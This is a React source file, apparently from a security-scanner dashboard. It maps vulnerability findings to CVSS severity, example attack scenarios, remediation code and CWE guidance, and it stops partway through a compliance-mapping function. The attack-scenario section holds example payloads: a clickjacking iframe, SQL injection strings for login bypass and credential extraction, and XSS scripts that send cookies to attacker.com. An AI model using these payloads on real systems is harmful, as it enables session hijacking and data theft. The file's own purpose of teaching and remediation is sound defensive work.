import React, { useState } from 'react';
import { Card, CardContent, CardHeader, CardTitle } from '@/components/ui/card';
import { Button } from '@/components/ui/button';
import { Badge } from '@/components/ui/badge';
import { Tabs, TabsContent, TabsList, TabsTrigger } from '@/components/ui/tabs';
import { Progress } from '@/components/ui/progress';
import { 
  Copy, ExternalLink, Shield, AlertTriangle, GitBranch, Code, 
  AlertOctagon, CheckCircle, ChevronDown, ChevronUp, Target,
  Zap, Lock, Globe, FileCode, PlayCircle, Wrench, BookOpen,
  ArrowRight, Minus, Plus, FileText
} from 'lucide-react';
import { toast } from 'sonner';

// CVSS v3.1 Score Calculation Helpers
const getCVSSColor = (score) => {
  if (score >= 9.0) return 'bg-red-600 text-white';
  if (score >= 7.0) return 'bg-orange-500 text-white';
  if (score >= 4.0) return 'bg-yellow-500 text-black';
  if (score >= 0.1) return 'bg-green-500 text-white';
  return 'bg-gray-500 text-white';
};

const getCVSSSeverity = (score) => {
  if (score >= 9.0) return 'Critical';
  if (score >= 7.0) return 'High';
  if (score >= 4.0) return 'Medium';
  if (score >= 0.1) return 'Low';
  return 'None';
};

// Parse CVSS Vector String
const parseCVSSVector = (vectorString) => {
  if (!vectorString) return null;
  const parts = vectorString.split('/');
  const result = {};
  parts.forEach(part => {
    const [key, value] = part.split(':');
    result[key] = value;
  });
  return result;
};

// CVSS Metric Labels
const CVSS_LABELS = {
  AV: { label: 'Attack Vector', N: 'Network', A: 'Adjacent', L: 'Local', P: 'Physical' },
  AC: { label: 'Attack Complexity', L: 'Low', H: 'High' },
  PR: { label: 'Privileges Required', N: 'None', L: 'Low', H: 'High' },
  UI: { label: 'User Interaction', N: 'None', R: 'Required' },
  S: { label: 'Scope', U: 'Unchanged', C: 'Changed' },
  C: { label: 'Confidentiality', N: 'None', L: 'Low', H: 'High' },
  I: { label: 'Integrity', N: 'None', L: 'Low', H: 'High' },
  A: { label: 'Availability', N: 'None', L: 'Low', H: 'High' },
};

// Generate example attack scenarios based on CWE/vulnerability type
const generateAttackScenario = (finding) => {
  const cweId = finding.cve_id || '';
  const title = (finding.title || '').toLowerCase();
  
  if (cweId.includes('693') || title.includes('header') || title.includes('csp')) {
    return {
      description: 'Without proper security headers, attackers can embed the site in iframes for clickjacking, inject scripts due to lack of CSP, or intercept traffic due to missing HSTS.',
      exploits: [
        {
          name: 'Clickjacking Attack',
          description: 'Trick users into clicking hidden elements',
          payload: "<iframe src='https://target.com/transfer?amount=1000&to=attacker' style='opacity:0;position:absolute;'></iframe>",
          result: 'User unknowingly performs sensitive actions',
          realCases: ['Facebook Likejacking attacks', 'Various banking site clickjacking']
        },
        {
          name: 'XSS via Missing CSP',
          description: 'Inject malicious scripts without CSP restrictions',
          payload: "<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>",
          result: 'Session hijacking, data theft',
          realCases: ['British Airways breach', 'Ticketmaster Magecart attack']
        }
      ]
    };
  }
  
  if (title.includes('sql') || cweId.includes('89')) {
    return {
      description: 'SQL Injection allows attackers to manipulate database queries, potentially accessing, modifying, or deleting data.',
      exploits: [
        {
          name: 'Authentication Bypass',
          description: 'Bypass login with SQL injection',
          payload: "' OR '1'='1' --",
          result: 'Unauthorized access to admin accounts',
          realCases: ['Sony Pictures breach (2011)', 'Heartland Payment Systems']
        },
        {
          name: 'Data Extraction',
          description: 'Extract sensitive data using UNION-based injection',
          payload: "1' UNION SELECT username, password FROM users--",
          result: 'Full database dump including credentials',
          realCases: ['TalkTalk breach (2015)', 'Ashley Madison hack']
        }
      ]
    };
  }
  
  if (title.includes('xss') || title.includes('cross-site') || cweId.includes('79')) {
    return {
      description: 'Cross-Site Scripting (XSS) allows attackers to inject malicious scripts that execute in victims browsers.',
      exploits: [
        {
          name: 'Session Hijacking',
          description: 'Steal user session cookies',
          payload: "<script>new Image().src='https://attacker.com/steal?c='+document.cookie</script>",
          result: 'Account takeover without credentials',
          realCases: ['Twitter XSS worm (2010)', 'eBay persistent XSS']
        }
      ]
    };
  }
  
  if (title.includes('encryption') || title.includes('des') || title.includes('3des') || cweId.includes('327')) {
    return {
      description: 'Weak encryption algorithms like DES/3DES can be broken with modern computing power, exposing sensitive data.',
      exploits: [
        {
          name: 'Sweet32 Attack',
          description: 'Birthday attack on 64-bit block ciphers',
          payload: 'Capture ~32GB of encrypted traffic, then perform collision analysis',
          result: 'Decrypt encrypted communications',
          realCases: ['SWEET32 vulnerability (CVE-2016-2183)', 'TLS/SSL downgrade attacks']
        }
      ]
    };
  }
  
  // Default scenario
  return {
    description: 'This vulnerability could be exploited by attackers to compromise the application security.',
    exploits: []
  };
};

// Generate remediation steps — specific, actionable guidance per vulnerability type
const generateRemediationSteps = (finding) => {
  const title = (finding.title || '').toLowerCase();
  const desc = (finding.description || '').toLowerCase();
  // The backend stores CWE ids under ``cwe_id``. Older seed data also
  // occasionally used ``cve_id`` — check both so we never miss the CWE
  // dispatch below.
  const cweId = (finding.cwe_id || finding.cve_id || '').toUpperCase();
  const owaspId = (finding.owasp_id || '').toUpperCase();
  const combined = `${title} ${desc} ${cweId.toLowerCase()} ${owaspId.toLowerCase()}`;
  const pkg = finding.package_name || 'affected-package';
  const fixedVer = finding.fixed_version;
  const filePath = finding.file_path || '';
  const lineNum = finding.line_number;
  const ruleId = finding.rule_id || finding.check_id || finding.id || '';

  // Backend ``remediation`` can be a short string (LiteSabre OWASP rules)
  // *or* an object with ``description`` + ``references``. Accept both.
  const backendRem = finding.remediation;
  const backendRemStr = typeof backendRem === 'string' ? backendRem : (backendRem?.description || '');
  const backendRemRefs = (backendRem && typeof backendRem === 'object' && Array.isArray(backendRem.references))
    ? backendRem.references.filter(Boolean)
    : [];
  const hasRichBackendRemediation = backendRemStr.length > 80 && !backendRemStr.toLowerCase().startsWith('review and fix');

  // ─── Security Headers / CSP ────────────────────────────────────────
  if (combined.match(/\bheader\b|content.security.policy|\bcsp\b|x-frame|x-content-type|hsts|strict.transport/) || cweId.includes('CWE-693') || cweId.includes('CWE-1021')) {
    const steps = [
      {
        title: 'Add Security Headers in Nginx',
        description: 'Configure your reverse proxy or web server to send all required security headers with every response.',
        code: `# /etc/nginx/conf.d/security-headers.conf
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https:; font-src 'self';" always;
add_header X-Frame-Options "DENY" always;
add_header X-Content-Type-Options "nosniff" always;
add_header Strict-Transport-Security "max-age=63072000; includeSubDomains; preload" always;
add_header Referrer-Policy "strict-origin-when-cross-origin" always;
add_header Permissions-Policy "geolocation=(), microphone=(), camera=()" always;
add_header X-XSS-Protection "0" always;  # Deprecated but safe to set to 0`,
        language: 'nginx'
      },
      {
        title: 'Add Headers in Express.js / Node.js',
        description: 'Use the helmet middleware package to set secure headers automatically.',
        code: `const helmet = require('helmet');
const app = express();

app.use(helmet({
  contentSecurityPolicy: {
    directives: {
      defaultSrc: ["'self'"],
      scriptSrc: ["'self'"],
      styleSrc: ["'self'", "'unsafe-inline'"],
      imgSrc: ["'self'", "data:", "https:"],
    }
  },
  hsts: { maxAge: 63072000, includeSubDomains: true, preload: true },
  frameguard: { action: 'deny' },
  referrerPolicy: { policy: 'strict-origin-when-cross-origin' }
}));`,
        language: 'javascript'
      }
    ];
    return steps;
  }

  // ─── SQL Injection ─────────────────────────────────────────────────
  if (combined.match(/sql.inject|cwe-89/)) {
    return [
      {
        title: 'Use Parameterized Queries (Prepared Statements)',
        description: `Replace string concatenation/interpolation in ${filePath || 'your data access layer'} with parameterized queries. This ensures user input is always treated as data, never as SQL code.`,
        code: `# VULNERABLE — string interpolation allows injection:
query = f"SELECT * FROM users WHERE email = '{user_input}'"

# SECURE — parameterized query (Python + psycopg2):
cursor.execute(
    "SELECT * FROM users WHERE email = %s",
    (user_input,)
)

# SECURE — SQLAlchemy ORM:
from sqlalchemy import text
result = session.execute(
    text("SELECT * FROM users WHERE email = :email"),
    {"email": user_input}
)

# SECURE — Node.js + pg:
const result = await pool.query(
    'SELECT * FROM users WHERE email = $1',
    [userInput]
);`,
        language: 'python'
      },
      {
        title: 'Add Input Validation',
        description: 'Validate and sanitize all user inputs before they reach any query layer. Use allowlists for expected formats.',
        code: `import re

def validate_email(email: str) -> str:
    """Validate email format before use in queries."""
    pattern = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}$'
    if not re.match(pattern, email):
        raise ValueError("Invalid email format")
    return email

# Use an ORM with built-in escaping
from sqlalchemy.orm import Session
user = session.query(User).filter(User.email == validated_email).first()`,
        language: 'python'
      }
    ];
  }

  // ─── Command / OS Injection ────────────────────────────────────────
  if (combined.match(/command.inject|os.inject|cwe-78|shell.inject/)) {
    return [
      {
        title: 'Avoid Shell Execution — Use Language APIs',
        description: `In ${filePath || 'your code'}${lineNum ? ` (line ${lineNum})` : ''}, replace os.system() / subprocess with shell=False and argument lists. Never pass user input to shell commands.`,
        code: `import subprocess

# VULNERABLE — shell=True with user input:
subprocess.call(f"ping {user_input}", shell=True)

# SECURE — pass arguments as a list, no shell:
subprocess.run(
    ["ping", "-c", "4", validated_host],
    shell=False,
    capture_output=True,
    timeout=10
)

# SECURE — use shlex.quote if shell is unavoidable:
import shlex
safe_input = shlex.quote(user_input)
subprocess.run(f"ping -c 4 {safe_input}", shell=True)`,
        language: 'python'
      },
      {
        title: 'Validate Input Against Allowlist',
        description: 'Only allow known-safe values. For IP addresses or hostnames, validate the format strictly.',
        code: `import ipaddress

def validate_host(host: str) -> str:
    """Only allow valid IP addresses or whitelisted hostnames."""
    try:
        ipaddress.ip_address(host)  # Valid IP
        return host
    except ValueError:
        pass
    ALLOWED = {"google.com", "api.internal.corp"}
    if host in ALLOWED:
        return host
    raise ValueError(f"Host not allowed: {host}")`,
        language: 'python'
      }
    ];
  }

  // ─── Cross-Site Scripting (XSS) ────────────────────────────────────
  if (combined.match(/\bxss\b|cross.site.script|cwe-79/)) {
    return [
      {
        title: 'Encode Output in HTML Context',
        description: `In ${filePath || 'your templates/views'}${lineNum ? ` (line ${lineNum})` : ''}, always encode user-controlled data before inserting it into HTML. Use framework auto-escaping.`,
        code: `// VULNERABLE — raw HTML insertion:
element.innerHTML = userInput;
document.write(userInput);

// SECURE — use textContent (auto-encodes):
element.textContent = userInput;

// SECURE — React auto-escapes by default:
return <div>{userInput}</div>  // Safe — JSX auto-escapes

// DANGEROUS — React dangerouslySetInnerHTML:
// NEVER do: <div dangerouslySetInnerHTML={{__html: userInput}} />

// SECURE — DOMPurify for rich text:
import DOMPurify from 'dompurify';
const clean = DOMPurify.sanitize(userInput);
return <div dangerouslySetInnerHTML={{__html: clean}} />;`,
        language: 'javascript'
      },
      {
        title: 'Set Content-Security-Policy Header',
        description: 'A strong CSP prevents inline script execution even if XSS is present.',
        code: `# CSP that blocks inline scripts:
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self';

# Python / FastAPI:
from fastapi.middleware.cors import CORSMiddleware
@app.middleware("http")
async def add_csp(request, call_next):
    response = await call_next(request)
    response.headers["Content-Security-Policy"] = "default-src 'self'; script-src 'self'"
    return response`,
        language: 'http'
      }
    ];
  }

  // ─── Hardcoded Credentials / Secrets ───────────────────────────────
  if (combined.match(/hardcod|hard.cod|cwe-798|secret.detect|credential|private.key|api.key.exposed|password.exposed/)) {
    return [
      {
        title: 'Move Secrets to Environment Variables',
        description: `Remove the hardcoded credential from ${filePath || 'source code'}${lineNum ? ` at line ${lineNum}` : ''} and load it from the environment at runtime.`,
        code: `# VULNERABLE — hardcoded secret in source:
DATABASE_PASSWORD = "SuperSecret123!"
API_KEY = "sk-live-abc123def456"

# SECURE — load from environment:
import os
DATABASE_PASSWORD = os.environ["DATABASE_PASSWORD"]
API_KEY = os.environ["API_KEY"]
# Fail fast if not set — no silent empty strings

# .env file (NOT committed to git):
DATABASE_PASSWORD=SuperSecret123!
API_KEY=sk-live-abc123def456

# .gitignore:
.env
.env.local
.env.production`,
        language: 'python'
      },
      {
        title: 'Rotate Compromised Credentials',
        description: 'Any credential found in source code or git history must be considered compromised. Rotate immediately.',
        code: `# Step 1: Rotate the credential in your provider dashboard
#   - Database: Change password via admin console
#   - API key: Revoke old key, generate new one
#   - AWS: Deactivate key in IAM, create new access key

# Step 2: Remove from git history
pip install git-filter-repo
git filter-repo --path-glob '*.env' --invert-paths
git push --force --all

# Step 3: Add pre-commit hooks to prevent future leaks
pip install detect-secrets
detect-secrets scan > .secrets.baseline
# Add to .pre-commit-config.yaml:
# - repo: https://github.com/Yelp/detect-secrets
#   hooks: [{id: detect-secrets, args: ['--baseline', '.secrets.baseline']}]`,
        language: 'bash'
      },
      {
        title: 'Use a Secrets Manager (Production)',
        description: 'For production deployments, use a dedicated secrets manager instead of .env files.',
        code: `# AWS Secrets Manager:
import boto3
client = boto3.client('secretsmanager')
secret = client.get_secret_value(SecretId='prod/database/password')
password = secret['SecretString']

# HashiCorp Vault:
import hvac
client = hvac.Client(url='https://vault.internal:8200')
secret = client.secrets.kv.v2.read_secret_version(path='database/creds')
password = secret['data']['data']['password']

# Docker Secrets (Swarm/Compose):
# docker-compose.yml:
#   secrets:
#     db_password:
#       file: ./db_password.txt
#   services:
#     app:
#       secrets: [db_password]
# Read from: /run/secrets/db_password`,
        language: 'python'
      }
    ];
  }

  // ─── Insecure Deserialization ──────────────────────────────────────
  if (combined.match(/deserializ|cwe-502|pickle|marshal|yaml.load/)) {
    return [
      {
        title: 'Replace Unsafe Deserialization with JSON',
        description: `In ${filePath || 'your code'}${lineNum ? ` (line ${lineNum})` : ''}, replace pickle/marshal/yaml.load with safe alternatives that cannot execute arbitrary code.`,
        code: `# VULNERABLE — pickle can execute arbitrary code:
import pickle
data = pickle.loads(untrusted_bytes)  # RCE possible!

# VULNERABLE — yaml.load executes Python objects:
import yaml
data = yaml.load(untrusted_string)  # RCE possible!

# SECURE — use JSON (no code execution):
import json
data = json.loads(untrusted_string)

# SECURE — use yaml.safe_load:
data = yaml.safe_load(untrusted_string)

# SECURE — if pickle is required, use hmac signing:
import hmac, hashlib
def verify_and_load(data_bytes, signature, key):
    expected = hmac.new(key, data_bytes, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(signature, expected):
        raise ValueError("Signature verification failed")
    return pickle.loads(data_bytes)  # Only after verification`,
        language: 'python'
      }
    ];
  }

  // ─── Path Traversal / Directory Traversal ──────────────────────────
  if (combined.match(/path.traversal|directory.traversal|cwe-22|\.\.\/|\.\.\\\\|lfi\b/)) {
    return [
      {
        title: 'Canonicalize and Validate File Paths',
        description: `In ${filePath || 'your file-serving code'}${lineNum ? ` (line ${lineNum})` : ''}, resolve the path to its canonical form and verify it stays within the allowed directory.`,
        code: `import os
from pathlib import Path

UPLOAD_DIR = Path("/var/www/uploads").resolve()

def safe_file_path(user_filename: str) -> Path:
    """Resolve path and ensure it's within UPLOAD_DIR."""
    # Remove any path separators from user input
    clean_name = os.path.basename(user_filename)
    
    # Resolve to absolute path
    target = (UPLOAD_DIR / clean_name).resolve()
    
    # Verify it's still within the allowed directory
    if not str(target).startswith(str(UPLOAD_DIR)):
        raise ValueError(f"Path traversal attempt blocked: {user_filename}")
    
    if not target.exists():
        raise FileNotFoundError(f"File not found: {clean_name}")
    
    return target

# Node.js equivalent:
# const path = require('path');
# const UPLOAD_DIR = path.resolve('/var/www/uploads');
# const target = path.resolve(UPLOAD_DIR, path.basename(userInput));
# if (!target.startsWith(UPLOAD_DIR)) throw new Error('Path traversal');`,
        language: 'python'
      }
    ];
  }

  // ─── Server-Side Request Forgery (SSRF) ────────────────────────────
  if (combined.match(/\bssrf\b|server.side.request|cwe-918/)) {
    return [
      {
        title: 'Validate URLs Against Allowlist',
        description: `In ${filePath || 'your code'}${lineNum ? ` (line ${lineNum})` : ''}, validate all user-supplied URLs. Block internal/private IP ranges and only allow known-safe hosts.`,
        code: `from urllib.parse import urlparse
import ipaddress, socket

ALLOWED_HOSTS = {"api.github.com", "cdn.example.com"}
BLOCKED_RANGES = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("127.0.0.0/8"),
    ipaddress.ip_network("169.254.0.0/16"),  # AWS metadata
]

def validate_url(url: str) -> str:
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        raise ValueError(f"Scheme not allowed: {parsed.scheme}")
    
    # Resolve hostname to IP and check against blocked ranges
    try:
        ip = ipaddress.ip_address(socket.gethostbyname(parsed.hostname))
        for network in BLOCKED_RANGES:
            if ip in network:
                raise ValueError(f"Internal IP blocked: {ip}")
    except socket.gaierror:
        raise ValueError(f"Cannot resolve: {parsed.hostname}")
    
    if ALLOWED_HOSTS and parsed.hostname not in ALLOWED_HOSTS:
        raise ValueError(f"Host not in allowlist: {parsed.hostname}")
    
    return url`,
        language: 'python'
      }
    ];
  }

  // ─── Weak Cryptography ─────────────────────────────────────────────
  if (combined.match(/\bdes\b|3des|rc4\b|md5|sha-?1\b|weak.crypt|weak.encr|broken.crypt|cwe-327|cwe-328|cwe-916/)) {
    return [
      {
        title: 'Replace Weak Algorithms with Modern Alternatives',
        description: `In ${filePath || 'your cryptographic code'}${lineNum ? ` (line ${lineNum})` : ''}, upgrade to AES-256-GCM for encryption, SHA-256+ for hashing, and bcrypt/argon2 for passwords.`,
        code: `# ── Symmetric Encryption: Replace DES/3DES/RC4 with AES-256-GCM ──
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
import os

key = AESGCM.generate_key(bit_length=256)  # 256-bit key
aesgcm = AESGCM(key)
nonce = os.urandom(12)  # 96-bit nonce
ciphertext = aesgcm.encrypt(nonce, plaintext_bytes, None)
plaintext = aesgcm.decrypt(nonce, ciphertext, None)

# ── Hashing: Replace MD5/SHA-1 with SHA-256 ──
import hashlib
digest = hashlib.sha256(data).hexdigest()

# ── Password Hashing: Use bcrypt (NOT MD5/SHA-1) ──
import bcrypt
hashed = bcrypt.hashpw(password.encode(), bcrypt.gensalt(rounds=12))
is_valid = bcrypt.checkpw(password.encode(), hashed)`,
        language: 'python'
      }
    ];
  }

  // ─── Privileged Container / K8s Misconfiguration ───────────────────
  if (combined.match(/privileged.container|runasroot|runas.*0|host.network|privilege.escalat|k8s|kubernetes/)) {
    return [
      {
        title: 'Apply Least-Privilege Pod Security',
        description: `In ${filePath || 'your Kubernetes manifests'}${lineNum ? ` (line ${lineNum})` : ''}, set security contexts to enforce non-root execution and drop all capabilities.`,
        code: `# pod-security.yaml
apiVersion: v1
kind: Pod
spec:
  securityContext:
    runAsNonRoot: true
    runAsUser: 1000
    fsGroup: 2000
  containers:
  - name: app
    image: myapp:1.0
    securityContext:
      allowPrivilegeEscalation: false
      readOnlyRootFilesystem: true
      capabilities:
        drop: ["ALL"]
    resources:
      limits:
        cpu: "500m"
        memory: "256Mi"
      requests:
        cpu: "100m"
        memory: "128Mi"`,
        language: 'yaml'
      }
    ];
  }

  // ─── Dockerfile Issues ─────────────────────────────────────────────
  if (combined.match(/dockerfile|docker|container.running.as.root|latest.tag/)) {
    return [
      {
        title: 'Secure Dockerfile Best Practices',
        description: `In ${filePath || 'your Dockerfile'}, use a specific base image version, run as non-root, and minimize attack surface.`,
        code: `# Use specific version (NOT :latest)
FROM node:20.11-alpine AS build

WORKDIR /app
COPY package*.json ./
RUN npm ci --only=production

COPY . .

# Create non-root user
RUN addgroup -S appgroup && adduser -S appuser -G appgroup

# Switch to non-root user
USER appuser

# Set read-only filesystem where possible
EXPOSE 3000
CMD ["node", "server.js"]`,
        language: 'dockerfile'
      }
    ];
  }

  // ─── Terraform / IaC Security ──────────────────────────────────────
  if (combined.match(/terraform|security.group|s3.bucket|acl.*public|unencrypted|cidr.*0\.0\.0\.0/)) {
    return [
      {
        title: 'Apply Least-Privilege IaC Configuration',
        description: `In ${filePath || 'your Terraform files'}${lineNum ? ` (line ${lineNum})` : ''}, restrict network access to known CIDR ranges, enable encryption, and use private ACLs.`,
        code: `# Restrict security group to specific IPs:
resource "aws_security_group_rule" "ssh" {
  type        = "ingress"
  from_port   = 22
  to_port     = 22
  protocol    = "tcp"
  cidr_blocks = ["10.0.0.0/8"]  # NOT 0.0.0.0/0
}

# Enable S3 encryption:
resource "aws_s3_bucket_server_side_encryption_configuration" "enc" {
  bucket = aws_s3_bucket.data.id
  rule {
    apply_server_side_encryption_by_default {
      sse_algorithm = "aws:kms"
    }
  }
}

# Private ACL:
resource "aws_s3_bucket_acl" "private" {
  bucket = aws_s3_bucket.data.id
  acl    = "private"
}`,
        language: 'hcl'
      }
    ];
  }

  // ─── Generic Dependency Vulnerability (with fixed version) ─────────
  if (fixedVer) {
    // Determine the right package manager command
    const isNpm = combined.includes('npm') || pkg.match(/^[@a-z]/);
    const isPypi = combined.includes('pypi') || combined.includes('python') || pkg.match(/^[a-z_-]+$/i);
    const isMaven = combined.includes('maven') || pkg.includes(':');
    const isGo = combined.includes('go') || pkg.includes('/');

    let installCmd;
    if (isMaven) {
      installCmd = `<!-- Update version in pom.xml -->
<dependency>
    <groupId>${pkg.split(':')[0] || pkg}</groupId>
    <artifactId>${pkg.split(':')[1] || pkg}</artifactId>
    <version>${fixedVer}</version>
</dependency>

mvn dependency:resolve`;
    } else if (isGo) {
      installCmd = `go get ${pkg}@v${fixedVer}
go mod tidy`;
    } else if (isPypi) {
      installCmd = `pip install '${pkg}>=${fixedVer}'

# Or update requirements.txt:
# ${pkg}>=${fixedVer}
# Then: pip install -r requirements.txt`;
    } else {
      installCmd = `npm install ${pkg}@${fixedVer}
# or
yarn add ${pkg}@${fixedVer}`;
    }

    return [
      {
        title: `Upgrade ${pkg} to ${fixedVer}`,
        description: `A patched version (${fixedVer}) is available that addresses this vulnerability. Update your dependency and verify the application still works correctly.`,
        code: installCmd,
        language: 'bash'
      },
      {
        title: 'Verify the Upgrade',
        description: 'After updating, run your test suite and check for breaking changes.',
        code: `# Run tests to verify no regressions:
npm test   # or: pytest / mvn test / go test ./...

# Check for other outdated dependencies:
npm audit        # Node.js
pip-audit        # Python
mvn dependency-check:check  # Java`,
        language: 'bash'
      }
    ];
  }

  // ─── Use backend remediation if available and rich ─────────────────
  if (hasRichBackendRemediation) {
    const lines = backendRemStr.split('\n').filter(l => l.trim());
    const steps = [{
      title: backendRem?.action === 'fix_code' ? 'Fix Vulnerable Code' : 'Apply Fix',
      description: lines.slice(0, 3).join(' ').replace(/^#+\s*/, '').trim(),
      code: lines.filter(l => l.startsWith('   ') || l.startsWith('```')).join('\n').replace(/```\w*/g, '').trim() || null,
      language: 'code',
    }];
    if (backendRemRefs.length) {
      steps.push({
        title: 'References',
        description: `Learn more: ${backendRemRefs.join(', ')}`,
        code: null,
        language: null,
      });
    }
    return steps;
  }

  // ─── CWE-specific quick guides ─────────────────────────────────────
  // Compact library of the top ~25 CWEs we see. Every entry produces a
  // grounded fix instead of the "Review and Fix" placeholder. Anything
  // deeper still falls through to the generic bottom rung.
  const CWE_GUIDES = {
    'CWE-22':  { title: 'Prevent Path Traversal',           tip: 'Canonicalise the path with os.path.realpath / Path.resolve() and assert it stays inside the allowed root. Reject any request containing "..".' },
    'CWE-77':  { title: 'Avoid Command Injection',          tip: 'Never pass user input to shell=True. Use subprocess with an argument list, or shlex.quote() when shell is unavoidable.' },
    'CWE-78':  { title: 'Avoid OS Command Injection',       tip: 'Replace os.system / subprocess(shell=True) with argument-list calls. Validate hostnames/paths against an allow-list.' },
    'CWE-79':  { title: 'Prevent Cross-Site Scripting',     tip: 'Use framework auto-escaping. Sanitise HTML with DOMPurify before injecting. Prefer .textContent over .innerHTML.' },
    'CWE-89':  { title: 'Use Parameterised SQL Queries',    tip: 'Replace f-strings/format() in SQL with placeholders (?, %s, :name). Prefer a mature ORM (SQLAlchemy, Prisma).' },
    'CWE-90':  { title: 'Escape LDAP Filter Input',         tip: 'Use ldap3.utils.conv.escape_filter_chars() (or the equivalent) before concatenating into a filter.' },
    'CWE-200': { title: 'Redact Sensitive Data',            tip: 'Return generic error messages to clients, log the details server-side only. Never leak stack traces or SQL errors in HTTP responses.' },
    'CWE-209': { title: 'Suppress Error Details',           tip: 'Turn off DEBUG in production; wrap route handlers so unhandled exceptions return a generic 500 with a correlation id.' },
    'CWE-284': { title: 'Enforce Authorization on Route',   tip: 'Add Depends(get_current_user) / @login_required / policy checks to the handler. Log every allow/deny.' },
    'CWE-287': { title: 'Fix Authentication Weakness',      tip: 'Require MFA for privileged users, rate-limit login, verify passwords with bcrypt/argon2, invalidate session on password change.' },
    'CWE-295': { title: 'Enable Certificate Validation',    tip: 'Never pass verify=False. Trust the OS CA bundle or a pinned CA; use certifi in Python.' },
    'CWE-306': { title: 'Add Missing Authentication',       tip: 'Every non-public endpoint should require a token or session. Add the auth dependency to the route.' },
    'CWE-311': { title: 'Encrypt Sensitive Data at Rest',   tip: 'Use AES-GCM / ChaCha20-Poly1305 with random nonces; encrypt PII columns; enable database TDE.' },
    'CWE-327': { title: 'Replace Weak Cryptographic Algorithm', tip: 'Migrate MD5/SHA-1/DES/RC4 to SHA-256+/AES-GCM. For passwords use bcrypt/argon2/scrypt, never a plain hash.' },
    'CWE-352': { title: 'Add CSRF Protection',              tip: 'Use SameSite=Lax/Strict cookies and a CSRF token (double-submit or synchroniser) on every state-changing form.' },
    'CWE-434': { title: 'Restrict Uploaded File Types',     tip: 'Validate content-type + magic bytes, store outside the web root, generate a random filename, cap size.' },
    'CWE-502': { title: 'Avoid Unsafe Deserialisation',     tip: 'Prefer JSON. If pickle/yaml.load/Java serialisation is unavoidable, HMAC-sign the payload and verify before deserialising.' },
    'CWE-521': { title: 'Enforce Strong Passwords',         tip: 'Require minimum length ≥ 12, check against HaveIBeenPwned k-anonymity API, disallow keyboard-walks.' },
    'CWE-522': { title: 'Protect Credentials in Transit',   tip: 'Serve every auth endpoint over HTTPS with HSTS. Never accept Basic auth over HTTP.' },
    'CWE-548': { title: 'Disable Directory Listing',        tip: 'On nginx set autoindex off; on Apache turn Options -Indexes; on S3 keep the bucket private + block public listing.' },
    'CWE-601': { title: 'Prevent Open Redirect',            tip: 'Reject absolute URLs in the redirect_to parameter; only allow relative paths or an explicit allow-list of hosts.' },
    'CWE-611': { title: 'Disable XML External Entities',    tip: 'Set XMLParser(resolve_entities=False) / disable DTD loading in your XML lib. Prefer JSON for new APIs.' },
    'CWE-693': { title: 'Add Missing Security Header',      tip: 'Add CSP, HSTS, X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy. Use helmet / secure-headers middleware.' },
    'CWE-798': { title: 'Rotate Hard-coded Credentials',    tip: 'Move the secret to env-vars or a secrets manager; rotate the exposed value immediately; add pre-commit secret scanning.' },
    'CWE-862': { title: 'Fix Missing Authorisation',        tip: 'Wrap the route with an authz decorator; check object ownership (row-level) not just role.' },
    'CWE-915': { title: 'Block Mass Assignment',            tip: 'Whitelist writable fields via a serializer/form; never spread request.data into ORM create().' },
    'CWE-918': { title: 'Prevent SSRF',                     tip: 'Validate the target URL against an allow-list of hosts; forbid link-local / loopback / metadata IPs.' },
    'CWE-1021':{ title: 'Prevent Clickjacking',             tip: 'Send Content-Security-Policy: frame-ancestors \'none\' or X-Frame-Options: DENY on every response.' },
    'CWE-1188':{ title: 'Remove Default Configuration',     tip: 'Delete default landing pages, change default credentials, disable sample apps before production launch.' },
  };
  const cweKey = cweId.match(/CWE-\d+/i)?.[0]?.toUpperCase();
  const cweGuide = cweKey ? CWE_GUIDES[cweKey] : null;

  // ─── Fallback: use whatever context we have ─────────────────────────
  const steps = [];
  if (cweGuide) {
    steps.push({
      title: cweGuide.title,
      description: `${cweGuide.tip}${filePath ? `  In this finding: ${filePath}${lineNum ? `:${lineNum}` : ''}.` : ''}`,
      code: null,
      language: null,
    });
  } else if (backendRemStr) {
    // Non-empty but short backend guidance — surface it verbatim so users
    // never see the useless "Review and fix the vulnerability" template.
    steps.push({
      title: 'Recommended Fix',
      description: backendRemStr,
      code: null,
      language: null,
    });
  } else {
    steps.push({
      title: 'Investigate and Fix',
      description: `Open ${filePath || 'the affected file'}${lineNum ? ` at line ${lineNum}` : ''} and apply the mitigation described in the vulnerability details above. ${cweId ? `See ${cweId} for the general pattern.` : ''}`.trim(),
      code: null,
      language: null,
    });
  }

  // Always show verification + reference links
  steps.push({
    title: 'Verify the Fix',
    description: 'After patching, re-run the LiteSabre scan on this commit to confirm the finding is gone and no regressions were introduced.',
    code: [
      `# Re-scan just this file / package:`,
      filePath ? `# ${filePath}` : `# ${pkg}`,
      pkg && fixedVer ? `pip install '${pkg}>=${fixedVer}'  # or: npm install ${pkg}@${fixedVer}` : `# Fix the code, then commit and push`,
      `# Then trigger a fresh LiteSabre scan from the dashboard.`,
    ].filter(Boolean).join('\n'),
    language: 'bash',
  });

  const refs = [];
  if (cweKey) refs.push(`https://cwe.mitre.org/data/definitions/${cweKey.replace('CWE-', '')}.html`);
  if (owaspId) {
    const owaspSlug = owaspId.toLowerCase().replace(':', '_');
    refs.push(`https://owasp.org/Top10/${owaspSlug}/`);
  }
  if (ruleId) refs.push(`Rule ${ruleId}`);
  if (backendRemRefs.length) refs.push(...backendRemRefs);
  if (refs.length) {
    steps.push({
      title: 'References',
      description: refs.join('  •  '),
      code: null,
      language: null,
    });
  }
  return steps;
};

// Generate compliance mapping
const generateComplianceMapping = (finding) => {
  const cweId = finding.cve_id || '';
  const title = (finding.title || '').toLowerCase();
  
  const mappings = [];
  
  // OWASP Top 10 2021 mapping
  if (title.includes('injection') || title.includes('sql')) {
    mappings.push({ framework: 'OWASP', id: 'A03:2021', name: 'Injection' });
  }
  if (title.includes('header') || title.includes('config') || title.includes('misconfigur')) {
